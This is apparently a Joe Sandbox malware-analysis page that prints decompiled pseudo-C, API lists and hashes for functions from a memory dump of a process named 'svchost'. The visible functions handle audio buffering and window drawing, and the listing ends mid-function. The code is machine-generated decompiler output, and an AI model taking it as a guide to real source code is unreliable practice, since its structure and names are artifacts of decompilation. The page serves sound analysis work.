    • String ID: T^I$gfff
    • API String ID: 3506841274-2792297147
    • Opcode ID: 41cbe53cc8b8207b904fcd72d02e0e1d72c53d6ecdd943bb7a0e5b951f57e7c2
    • Instruction ID: 2d599b94dc978d4b82ee64bb374e91882af597f683c2f348f5804e471c1339c3
    • Opcode Fuzzy Hash: 41cbe53cc8b8207b904fcd72d02e0e1d72c53d6ecdd943bb7a0e5b951f57e7c2
    • Instruction Fuzzy Hash: ECE17DB1508340ABC718DF55C884A6FB7E8FB98714F144E2EF59593290DB38E909CB6B
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0043D0D0 Relevance: 31.7, APIs: 21, Instructions: 205COMMON
    Download Yara Rule
    C-Code - Quality: 57%
    			E0043D0D0() {
				long _t65;
				signed int _t69;
				struct wavehdr_tag* _t72;
				signed int _t74;
				intOrPtr* _t88;
				intOrPtr _t89;
				void* _t92;
				long _t96;
				void* _t107;
				struct wavehdr_tag* _t111;
				struct wavehdr_tag* _t116;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t122;
				signed int _t125;
				signed int _t126;
				void* _t142;
				void* _t143;
				void* _t146;
				long _t155;
				void* _t156;
				intOrPtr _t157;
				intOrPtr _t160;
				long* _t161;
				void* _t162;
				void* _t163;
				intOrPtr* _t164;
				void* _t165;

				_t164 =  *((intOrPtr*)(_t165 + 0xc));
				while(1) {
					L1:
					_t65 = WaitForMultipleObjects(2, _t164 + 0x28, 0, 0x22b8);
					if(_t65 != 0) {
						break;
					}
					_t146 = _t164 + 0x30;
					 *0x49224c(_t146);
					_t155 =  *(_t164 + 0x10);
					 *(_t165 + 0x18) = _t155;
					 *0x492250(_t146);
					if(_t155 <= 0) {
						continue;
					} else {
						_t116 = ( *(_t164 + 0x14) << 5) +  *((intOrPtr*)(_t164 + 0xc));
						if((_t116->dwFlags & 0x00000002) != 0) {
							waveOutUnprepareHeader( *(_t164 + 4), _t116, 0x20);
						}
						_t160 =  *((intOrPtr*)(_t164 + 0x1c));
						_t69 =  *((intOrPtr*)(_t164 + 8)) - _t160;
						if(_t69 <= 0x3c00) {
							if(_t69 <= 0) {
								if( *((intOrPtr*)(_t165 + 0x14)) < 0x14) {
									continue;
								} else {
									_t161 = 0;
									if( *((intOrPtr*)(_t164 + 0x48)) == 0) {
										do {
											_t72 =  *((intOrPtr*)(_t164 + 0xc)) + _t161;
											if((_t72->dwFlags & 0x00000002) != 0) {
												waveOutUnprepareHeader( *(_t164 + 4), _t72, 0x20);
											}
											_t161 = _t161 + 0x20;
										} while (_t161 < 0x280);
									} else {
										 *0x49224c(_t146);
										_t92 =  *(_t164 + 0x28);
										 *((intOrPtr*)(_t164 + 0x1c)) = 0;
										 *(_t164 + 0x14) = 0;
										 *(_t164 + 0x10) = 0x14;
										if(_t92 != 0) {
											ReleaseSemaphore(_t92, 0x14, 0);
										}
										 *0x492250(_t146);
										continue;
									}
								}
							} else {
								goto L11;
							}
						} else {
							_t69 = 0x3c00;
							L11:
							_t125 = _t69;
							_t162 = _t160 +  *_t164;
							_t126 = _t125 >> 2;
							memcpy( *_t116, _t162, _t126 << 2);
							_t96 = memcpy(_t162 + _t126 + _t126, _t162, _t125 & 0x00000003);
							_t165 = _t165 + 0x18;
							_t116->dwBufferLength = _t96;
							 *((intOrPtr*)(_t164 + 0x1c)) =  *((intOrPtr*)(_t164 + 0x1c)) + _t96;
							waveOutPrepareHeader( *(_t164 + 4), _t116, 0x20);
							waveOutWrite( *(_t164 + 4), _t116, 0x20);
							_t163 = _t164 + 0x30;
							 *0x49224c(_t163);
							 *(_t164 + 0x10) =  *(_t164 + 0x10) - 1;
							 *0x492250(_t163);
							asm("cdq");
							 *(_t164 + 0x14) = ( *(_t164 + 0x14) + 1) % 0x14;
							continue;
						}
					}
					L25:
					 *0x49224c(0x4c9e70);
					_t157 =  *0x4c9e90; // 0x0
					_t119 =  *0x4c9e8c; // 0x0
					_t74 = 0;
					while(_t119 != 0 && _t74 < _t157 - _t119 >> 2) {
						if( *((intOrPtr*)(_t119 + _t74 * 4)) == _t164) {
							_t142 = _t119 + _t74 * 4;
							_t122 = _t157;
							_t53 = _t142 + 4; // 0x4
							_t88 = _t53;
							if(_t88 != _t122) {
								_t143 = _t142 - _t88;
								do {
									 *((intOrPtr*)(_t143 + _t88)) =  *_t88;
									_t88 = _t88 + 4;
								} while (_t88 != _t122);
								_t157 =  *0x4c9e90; // 0x0
							}
							_t55 = _t157 - 4; // -4
							_t89 = _t55;
							 *((intOrPtr*)(_t165 + 0x14)) = _t89;
							 *0x4c9e90 = _t89;
						} else {
							_t74 = _t74 + 1;
							continue;
						}
						break;
					}
					 *0x492250(0x4c9e70);
					E0043CB90( *(_t164 + 4));
					E004715AE( *_t164);
					E0043CB30( *((intOrPtr*)(_t164 + 0xc)));
					CloseHandle( *(_t164 + 0x20));
					CloseHandle( *(_t164 + 0x28));
					CloseHandle( *(_t164 + 0x2c));
					 *0x492294(_t164 + 0x30);
					E0048302C(_t164);
					return 0;
				}
				_t107 = _t65 - 1;
				if(_t107 == 0 || _t107 == 0x101) {
					waveOutPause( *(_t164 + 4));
					waveOutReset( *(_t164 + 4));
					_t156 = 0;
					do {
						_t117 =  *((intOrPtr*)(_t164 + 0xc));
						_t111 = _t156 + _t117;
						if(( *(_t156 + _t117 + 0x10) & 0x00000002) != 0) {
							waveOutUnprepareHeader( *(_t164 + 4), _t111, 0x20);
						}
						_t156 = _t156 + 0x20;
					} while (_t156 < 0x280);
				} else {
					goto L1;
				}
				goto L25;
			}































    0x0043d0d2
    0x0043d0d8
    0x0043d0d8
    0x0043d0eb
    0x0043d0ee
    0x00000000
    0x00000000
    0x0043d104
    0x0043d108
    0x0043d10e
    0x0043d112
    0x0043d116
    0x0043d11e
    0x00000000
    0x0043d120
    0x0043d129
    0x0043d12f
    0x0043d138
    0x0043d138
    0x0043d13e
    0x0043d144
    0x0043d14b
    0x0043d156
    0x0043d1c5
    0x00000000
    0x0043d1cb
    0x0043d1ce
    0x0043d1d2
    0x0043d244
    0x0043d247
    0x0043d24d
    0x0043d256
    0x0043d256
    0x0043d25c
    0x0043d25f
    0x0043d1d4
    0x0043d1d5
    0x0043d1db
    0x0043d1de
    0x0043d1e3
    0x0043d1e6
    0x0043d1ed
    0x0043d1f3
    0x0043d1f3
    0x0043d1fa
    0x00000000
    0x0043d1fa
    0x0043d1d2
    0x00000000
    0x00000000
    0x00000000
    0x0043d14d
    0x0043d14d
    0x0043d158
    0x0043d15b
    0x0043d15f
    0x0043d165
    0x0043d168
    0x0043d170
    0x0043d170
    0x0043d172
    0x0043d17e
    0x0043d181
    0x0043d18e
    0x0043d194
    0x0043d198
    0x0043d1a3
    0x0043d1a6
    0x0043d1b5
    0x0043d1b8
    0x00000000
    0x0043d1b8
    0x0043d14b
    0x0043d267
    0x0043d26c
    0x0043d272
    0x0043d278
    0x0043d27e
    0x0043d280
    0x0043d292
    0x0043d297
    0x0043d29a
    0x0043d29c
    0x0043d29c
    0x0043d2a1
    0x0043d2a3
    0x0043d2a5
    0x0043d2a7
    0x0043d2aa
    0x0043d2ad
    0x0043d2b1
    0x0043d2b1
    0x0043d2b7
    0x0043d2b7
    0x0043d2ba
    0x0043d2be
    0x0043d294
    0x0043d294
    0x00000000
    0x0043d294
    0x00000000
    0x0043d292
    0x0043d2c8
    0x0043d2d2
    0x0043d2db
    0x0043d2e4
    0x0043d2f6
    0x0043d2fc
    0x0043d302
    0x0043d308
    0x0043d30f
    0x0043d31d
    0x0043d31d
    0x0043d0f0
    0x0043d0f1
    0x0043d209
    0x0043d213
    0x0043d219
    0x0043d21b
    0x0043d21b
    0x0043d21e
    0x0043d228
    0x0043d231
    0x0043d231
    0x0043d237
    0x0043d23a
    0x0043d102
    0x00000000
    0x0043d102
    0x00000000

    APIs
    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000022B8), ref: 0043D0E5
    • RtlEnterCriticalSection.NTDLL(?), ref: 0043D108
    • RtlLeaveCriticalSection.NTDLL(?), ref: 0043D116
    • waveOutUnprepareHeader.WINMM(?,?,00000020), ref: 0043D138
    • waveOutPrepareHeader.WINMM(?,?,00000020), ref: 0043D181
    • waveOutWrite.WINMM(?,?,00000020), ref: 0043D18E
    • RtlEnterCriticalSection.NTDLL(?), ref: 0043D198
    • RtlLeaveCriticalSection.NTDLL(?), ref: 0043D1A6
    • RtlEnterCriticalSection.NTDLL(?), ref: 0043D1D5
    • ReleaseSemaphore.KERNEL32(?,00000014,00000000), ref: 0043D1F3
    • RtlLeaveCriticalSection.NTDLL(?), ref: 0043D1FA
    • waveOutPause.WINMM(?), ref: 0043D209
    • waveOutReset.WINMM(?), ref: 0043D213
    • waveOutUnprepareHeader.WINMM(?,00000000,00000020), ref: 0043D231
    • waveOutUnprepareHeader.WINMM(?,?,00000020), ref: 0043D256
    • RtlEnterCriticalSection.NTDLL(004C9E70), ref: 0043D26C
    • RtlLeaveCriticalSection.NTDLL(004C9E70), ref: 0043D2C8
    • CloseHandle.KERNEL32(?), ref: 0043D2F6
    • CloseHandle.KERNEL32(?), ref: 0043D2FC
    • CloseHandle.KERNEL32(?), ref: 0043D302
    • RtlDeleteCriticalSection.NTDLL(?), ref: 0043D308
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CriticalSection$wave$EnterHeaderLeave$CloseHandleUnprepare$DeleteMultipleObjectsPausePrepareReleaseResetSemaphoreWaitWrite
    • String ID:
    • API String ID: 361331667-0
    • Opcode ID: 22d3e0934b203717406250bcc7dc4c39d5b9e90db758ce7f4c3d82c6e0eeecbf
    • Instruction ID: b5bca92105ed07615b19db9e565a3ad56cefb1ab61dc4afcaa232daabe60f20b
    • Opcode Fuzzy Hash: 22d3e0934b203717406250bcc7dc4c39d5b9e90db758ce7f4c3d82c6e0eeecbf
    • Instruction Fuzzy Hash: 5F719E75A00219ABDB14DF68ED88AAB77A9FF4C704F04846AFD06D7350C678ED01CB99
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00438210 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 255windowCOMMON
    Download Yara Rule
    C-Code - Quality: 90%
    			E00438210(void* __ecx) {
				void* __ebp;
				struct HBRUSH__* _t95;
				int _t102;
				int _t103;
				signed int _t106;
				long _t120;
				intOrPtr _t122;
				void* _t131;
				intOrPtr _t143;
				intOrPtr _t148;
				intOrPtr _t159;
				int _t160;
				intOrPtr _t165;
				void* _t218;
				intOrPtr* _t225;
				int _t229;
				signed int _t233;
				intOrPtr _t237;
				void* _t238;

				_push(0xffffffff);
				_push(E0048FF20);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t237;
				_t238 = _t237 - 0x38;
				_t159 =  *((intOrPtr*)(_t238 + 0x4c));
				_t218 = __ecx;
				_push( *((intOrPtr*)(_t159 + 0x18)));
				_t225 = E00489369();
				CopyRect(_t238 + 0x28, _t159 + 0x1c);
				_t165 =  *0x4b8924; // 0x4b8938
				 *(_t238 + 0x10) =  *(_t159 + 0x10);
				 *((intOrPtr*)(_t238 + 0x58)) = _t165;
				_push(0xffffff);
				 *((intOrPtr*)(_t238 + 0x54)) = 0;
				_t95 = E00489F7B(_t238 + 0x24);
				if(_t95 != 0) {
					_t95 =  *(_t95 + 4);
				}
				FillRect( *(_t225 + 4), _t238 + 0x2c, _t95);
				 *((intOrPtr*)(_t238 + 0x20)) = 0x497168;
				_t14 = _t238 + 0x20; // 0x497168
				 *(_t238 + 0x50) = 1;
				E00489F15(_t14);
				 *((char*)(_t238 + 0x54)) = 0;
				_t160 = GetSystemMetrics(0x2e);
				_t229 = GetSystemMetrics(0x2d);
				 *((intOrPtr*)(_t238 + 0x14)) = _t229;
				if( *((intOrPtr*)(_t218 + 0x3c)) != 0) {
					 *(_t238 + 0x10) =  *(_t238 + 0x10) | 0x00000001;
				}
				_t102 =  *(_t238 + 0x30);
				 *(_t238 + 0x40) = _t102;
				_t103 = _t102 - _t229;
				 *(_t238 + 0x40) = _t103;
				 *(_t238 + 0x38) =  *(_t238 + 0x28);
				 *(_t238 + 0x38) = _t103 -  *((intOrPtr*)(_t218 + 0x58)) +  *((intOrPtr*)(_t218 + 0x50));
				_t106 =  *(_t238 + 0x10);
				_t233 = _t106 & 0x00000004;
				 *((intOrPtr*)(_t238 + 0x44)) =  *(_t238 + 0x34) - _t160;
				 *(_t238 + 0x3c) =  *(_t238 + 0x2c) + _t160;
				DrawFrameControl( *(_t225 + 4), _t238 + 0x3c, 3, ((_t106 & 0x00000001) << 0x00000003 | _t233) << 0x00000006 | 0x00000001);
				DrawEdge( *(_t225 + 4), _t238 + 0x2c, 0xa, 0xf);
				_t39 = _t160 + 1; // 0x1
				InflateRect(_t238 + 0x28,  ~( *((intOrPtr*)(_t238 + 0x14)) + 2),  ~_t39);
				 *(_t238 + 0x30) =  *(_t238 + 0x30) +  *((intOrPtr*)(_t218 + 0x50)) -  *((intOrPtr*)(_t218 + 0x58));
				if(_t233 == 0) {
					_t120 =  *(_t218 + 0x44);
					if(_t120 == 0xff000000) {
						_t120 = 0xffffff;
					}
				} else {
					_t120 = GetSysColor(0xf);
				}
				E00489F7B(_t238 + 0x1c);
				 *(_t238 + 0x50) = 2;
				_t122 = E00489512(_t225, _t238 + 0x18);
				 *((intOrPtr*)(_t238 + 0x18)) = _t122;
				 *((intOrPtr*)( *_t225 + 0x24))(7, _t120);
				Rectangle( *(_t225 + 4),  *(_t238 + 0x2c),  *(_t238 + 0x2c),  *(_t238 + 0x30),  *(_t238 + 0x34));
				E00489512(_t225,  *((intOrPtr*)(_t238 + 0x14)));
				if( *(_t218 + 0x44) != 0xff000000) {
					E0048564F(_t218, _t238 + 0x58);
				} else {
					E004833AF(_t238 + 0x58, _t233, _t218 + 0x60);
				}
				if( *((intOrPtr*)( *((intOrPtr*)(_t238 + 0x58)) - 8)) != 0) {
					 *((intOrPtr*)( *_t225 + 0x24))(0x11);
					E004895EE(_t225, 1);
					if(_t233 == 0) {
						asm("sbb eax, eax");
						 *((intOrPtr*)( *_t225 + 0x30))( ~( *(_t218 + 0x48) - 0xff000000) &  *(_t218 + 0x48));
					} else {
						OffsetRect(_t238 + 0x2c, 1, 1);
						 *((intOrPtr*)( *_t225 + 0x30))(GetSysColor(0x14));
						_t148 =  *((intOrPtr*)(_t238 + 0x58));
						 *((intOrPtr*)( *_t225 + 0x68))(_t148,  *((intOrPtr*)(_t148 - 8)), _t238 + 0x28, 0x25);
						OffsetRect(_t238 + 0x2c, 0xffffffff, 0xffffffff);
						 *((intOrPtr*)( *_t225 + 0x30))(GetSysColor(0x10));
					}
					_t143 =  *((intOrPtr*)(_t238 + 0x58));
					 *((intOrPtr*)( *_t225 + 0x68))(_t143,  *((intOrPtr*)(_t143 - 8)), _t238 + 0x28, 0x25);
				}
				if(( *(_t238 + 0x10) & 0x00000010) != 0) {
					InflateRect(_t238 + 0x2c, 0xffffffff, 0xffffffff);
					DrawFocusRect( *(_t225 + 4), _t238 + 0x28);
				}
				 *((intOrPtr*)(_t238 + 0x18)) = 0x497168;
				 *(_t238 + 0x50) = 3;
				E00489F15(_t238 + 0x18);
				 *(_t238 + 0x50) = 0xffffffff;
				_t131 = E004832C2(_t238 + 0x58);
				 *[fs:0x0] =  *((intOrPtr*)(_t238 + 0x48));
				return _t131;
			}






















    0x00438210
    0x00438212
    0x0043821d
    0x0043821e
    0x00438225
    0x00438229
    0x00438233
    0x00438235
    0x00438244
    0x00438246
    0x0043824f
    0x00438255
    0x00438259
    0x0043825d
    0x00438266
    0x0043826e
    0x00438275
    0x00438277
    0x00438277
    0x00438284
    0x0043828a
    0x00438292
    0x00438296
    0x0043829b
    0x004382a8
    0x004382b1
    0x004382b5
    0x004382bc
    0x004382c0
    0x004382c8
    0x004382c8
    0x004382cc
    0x004382d4
    0x004382d8
    0x004382dd
    0x004382e8
    0x004382ec
    0x004382f0
    0x00438301
    0x00438312
    0x00438316
    0x00438326
    0x00438339
    0x00438343
    0x00438354
    0x00438370
    0x00438374
    0x0043837c
    0x00438384
    0x00438386
    0x00438386
    0x00438376
    0x00438378
    0x00438378
    0x00438390
    0x00438399
    0x004383a1
    0x004383ac
    0x004383b0
    0x004383cb
    0x004383d8
    0x004383e4
    0x004383fc
    0x004383e6
    0x004383ee
    0x004383ee
    0x0043840a
    0x00438416
    0x0043841d
    0x00438424
    0x00438483
    0x00438488
    0x00438426
    0x00438435
    0x00438440
    0x00438443
    0x00438457
    0x00438463
    0x0043846e
    0x0043846e
    0x0043848b
    0x0043849f
    0x0043849f
    0x004384a7
    0x004384b2
    0x004384c1
    0x004384c1
    0x004384c7
    0x004384d3
    0x004384d8
    0x004384e1
    0x004384e9
    0x004384f6
    0x00438500

    APIs
    • CopyRect.USER32(?,?), ref: 00438246
      • Part of subcall function 00489F7B: __EH_prolog.LIBCMT ref: 00489F80
      • Part of subcall function 00489F7B: CreateSolidBrush.GDI32(?), ref: 00489F9D
    • FillRect.USER32(?,?,00000000), ref: 00438284
    • GetSystemMetrics.USER32(0000002E), ref: 004382AD
    • GetSystemMetrics.USER32(0000002D), ref: 004382B3
    • DrawFrameControl.USER32(?,?,00000003,?), ref: 00438326
    • DrawEdge.USER32(?,?,0000000A,0000000F), ref: 00438339
    • InflateRect.USER32(?,00FFFFFD,00000001), ref: 00438354
    • GetSysColor.USER32(0000000F), ref: 00438378
    • Rectangle.GDI32(?,?,?,?,?), ref: 004383CB
    • OffsetRect.USER32(?,00000001,00000001), ref: 00438435
    • GetSysColor.USER32(00000014), ref: 0043843B
    • OffsetRect.USER32(?,000000FF,000000FF), ref: 00438463
    • GetSysColor.USER32(00000010), ref: 00438469
    • InflateRect.USER32(?,000000FF,000000FF), ref: 004384B2
    • DrawFocusRect.USER32(?,?), ref: 004384C1
      • Part of subcall function 0048564F: GetWindowTextLengthA.USER32(?), ref: 0048565C
      • Part of subcall function 0048564F: GetWindowTextA.USER32(?,00000000,00000000), ref: 00485674
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$ColorDraw$InflateMetricsOffsetSystemTextWindow$BrushControlCopyCreateEdgeFillFocusFrameH_prologLengthRectangleSolid
    • String ID: hqI
    • API String ID: 4239342997-2158096905
    • Opcode ID: 74bbd221c701ee7368747ba6ce0b8125a603a61c5fe4ce1ade9de047dd7b2f1a
    • Instruction ID: 57e8d6adbbf3c6aeb42da2aafdb645f0194615487eb68c55ad32766f8a14089c
    • Opcode Fuzzy Hash: 74bbd221c701ee7368747ba6ce0b8125a603a61c5fe4ce1ade9de047dd7b2f1a
    • Instruction Fuzzy Hash: 85A16870208745AFC704DF64C888A6BFBE8BF98714F004A2DF69587390DBB4E905CB96
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00486B88 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 174windowCOMMON
    Download Yara Rule
    C-Code - Quality: 90%
    			E00486B88(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v5;
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				intOrPtr _t55;
				struct HWND__* _t56;
				intOrPtr _t78;
				intOrPtr _t90;
				signed int _t99;
				struct HWND__* _t100;
				struct HWND__* _t102;
				void* _t104;
				long _t110;
				void* _t113;
				struct HWND__* _t115;
				void* _t117;
				intOrPtr _t119;
				intOrPtr _t123;

				_t113 = __edx;
				_t119 = __ecx;
				_v12 = __ecx;
				_v8 = E004874EA(__ecx);
				_t55 = _a4;
				if(_t55 == 0) {
					if((_v5 & 0x00000040) == 0) {
						_t56 = GetWindow( *(__ecx + 0x1c), 4);
					} else {
						_t56 = GetParent( *(__ecx + 0x1c));
					}
					_t115 = _t56;
					if(_t115 != 0) {
						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
						if(_t100 != 0) {
							_t115 = _t100;
						}
					}
				} else {
					_t115 =  *(_t55 + 0x1c);
				}
				GetWindowRect( *(_t119 + 0x1c),  &_v44);
				if((_v5 & 0x00000040) != 0) {
					_t102 = GetParent( *(_t119 + 0x1c));
					GetClientRect(_t102,  &_v28);
					GetClientRect(_t115,  &_v60);
					MapWindowPoints(_t115, _t102,  &_v60, 2);
				} else {
					if(_t115 != 0) {
						_t99 = GetWindowLongA(_t115, 0xfffffff0);
						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
							_t115 = 0;
						}
					}
					_v100 = 0x28;
					if(_t115 != 0) {
						GetWindowRect(_t115,  &_v60);
						E0046F9E2(E0046F977(_t115, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t90 = E0046F80D();
						if(_t90 != 0) {
							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
						}
						E0046F9E2(E0046F977(_t90, 1),  &_v100);
						CopyRect( &_v60,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t117 = _v44.right - _v44.left;
				asm("cdq");
				_t104 = _v44.bottom - _v44.top;
				asm("cdq");
				_t114 = _v60.bottom;
				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
				asm("cdq");
				asm("cdq");
				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
				if(_t110 >= _v28.left) {
					_t78 = _v28.right;
					if(_t117 + _t110 > _t78) {
						_t110 = _t78 - _v44.right + _v44.left;
					}
				} else {
					_t110 = _v28.left;
				}
				if(_t123 >= _v28.top) {
					if(_t104 + _t123 > _v28.bottom) {
						_t123 = _v44.top - _v44.bottom + _v28.bottom;
					}
				} else {
					_t123 = _v28.top;
				}
				return E004875D2(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
			}

























    0x00486b88
    0x00486b90
    0x00486b93
    0x00486b9b
    0x00486b9e
    0x00486ba3
    0x00486bae
    0x00486bc0
    0x00486bb0
    0x00486bb3
    0x00486bb3
    0x00486bc6
    0x00486bca
    0x00486bd6
    0x00486bde
    0x00486be0
    0x00486be0
    0x00486bde
    0x00486ba5
    0x00486ba5
    0x00486ba5
    0x00486bef
    0x00486bf5
    0x00486c95
    0x00486c9c
    0x00486ca3
    0x00486cad
    0x00486bfb
    0x00486bfd
    0x00486c02
    0x00486c0d
    0x00486c16
    0x00486c16
    0x00486c0d
    0x00486c1a
    0x00486c21
    0x00486c62
    0x00486c71
    0x00486c7e
    0x00486c23
    0x00486c23
    0x00486c2a
    0x00486c2c
    0x00486c2c
    0x00486c3c
    0x00486c4f
    0x00486c59
    0x00486c59
    0x00486c21
    0x00486cbe
    0x00486cc4
    0x00486cc7
    0x00486cce
    0x00486cd1
    0x00486cd8
    0x00486cdf
    0x00486ce6
    0x00486ced
    0x00486cf2
    0x00486cf9
    0x00486d00
    0x00486d08
    0x00486d08
    0x00486cf4
    0x00486cf4
    0x00486cf4
    0x00486d0d
    0x00486d19
    0x00486d21
    0x00486d21
    0x00486d0f
    0x00486d0f
    0x00486d0f
    0x00486d3a

    APIs
      • Part of subcall function 004874EA: GetWindowLongA.USER32(?,000000F0), ref: 004874F6
    • GetParent.USER32(?), ref: 00486BB3
    • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 00486BD6
    • GetWindowRect.USER32(?,?), ref: 00486BEF
    • GetWindowLongA.USER32(00000000,000000F0), ref: 00486C02
    • CopyRect.USER32(?,?), ref: 00486C4F
    • CopyRect.USER32(?,?), ref: 00486C59
    • GetWindowRect.USER32(00000000,?), ref: 00486C62
      • Part of subcall function 0046F977: MonitorFromWindow.USER32(?,?), ref: 0046F98C
      • Part of subcall function 0046F9E2: GetMonitorInfoA.USER32(?,?), ref: 0046F9F9
    • CopyRect.USER32(?,?), ref: 00486C7E
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: RectWindow$Copy$LongMonitor$FromInfoMessageParentSend
    • String ID: ($@
    • API String ID: 1450647913-1311469180
    • Opcode ID: 9cbdb6971d5052a1847bdbe635844745fa8e2c0921d88da5ea7342e70562269f
    • Instruction ID: 8ea4aeb4195a7b8c1307846fff314cb44b9fff1c7ddc8bb076b343c021f2e50c
    • Opcode Fuzzy Hash: 9cbdb6971d5052a1847bdbe635844745fa8e2c0921d88da5ea7342e70562269f
    • Instruction Fuzzy Hash: FD519272A00219AFCF10EBA8DD85EEEBBB9EF44314F154526E901F7280D674ED058B68
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0041C360 Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 354COMMON
    Download Yara Rule
    C-Code - Quality: 87%
    			E0041C360(intOrPtr __ecx, intOrPtr __fp0) {
				int __ebp;
				intOrPtr _t126;
				void* _t129;
				void* _t130;
				void* _t139;
				intOrPtr _t158;
				intOrPtr _t180;
				signed int _t186;
				struct HBRUSH__* _t190;
				intOrPtr _t202;
				void* _t203;
				intOrPtr _t215;

				_t215 = __fp0;
				_push(0xffffffff);
				_push(E0048E978);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t202;
				_t203 = _t202 - 0x68;
				_t158 = __ecx;
				_t190 = 0;
				 *((intOrPtr*)(_t203 + 0x14)) = __ecx;
				 *(_t203 + 0x3c) = 0;
				 *(_t203 + 0x38) = 0x49637c;
				_t200 =  *(_t203 + 0x8c);
				 *((intOrPtr*)(_t203 + 0x80)) = 0;
				E00489EBE(_t203 + 0x3c, CreateRectRgn( *( *(_t203 + 0x8c)), ( *(_t203 + 0x8c))[1], ( *(_t203 + 0x8c))[2], _t200[3]));
				_t126 =  *((intOrPtr*)(_t158 + 0x5c));
				if(_t126 != 0) {
					if( *((intOrPtr*)(_t158 + 0xec)) == 0) {
						if(_t126 != 0) {
							_t180 =  *((intOrPtr*)(_t158 + 0x54));
						} else {
